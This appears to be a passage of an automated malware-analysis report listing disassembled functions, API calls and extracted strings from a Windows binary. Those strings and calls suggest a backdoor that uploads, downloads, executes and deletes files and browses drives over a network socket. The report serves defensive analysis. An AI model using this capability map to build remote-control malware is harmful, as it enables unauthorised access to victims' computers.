                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                  • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                  • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                  • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                  • API String ID: 1698304352-2559757301
                                  • Opcode ID: 95656dfe8ae8ede5788f7ba96900a99ba4c8720e40a65be906c165ee56cac39b
                                  • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                  • Opcode Fuzzy Hash: 95656dfe8ae8ede5788f7ba96900a99ba4c8720e40a65be906c165ee56cac39b
                                  • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040477E, Relevance: 88.8, APIs: 59, Instructions: 322filenetworkthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00404783
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                  • wcscmp.MSVCRT ref: 00404924
                                  • wcscmp.MSVCRT ref: 0040493C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                    • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                    • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                    • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                    • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                    • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
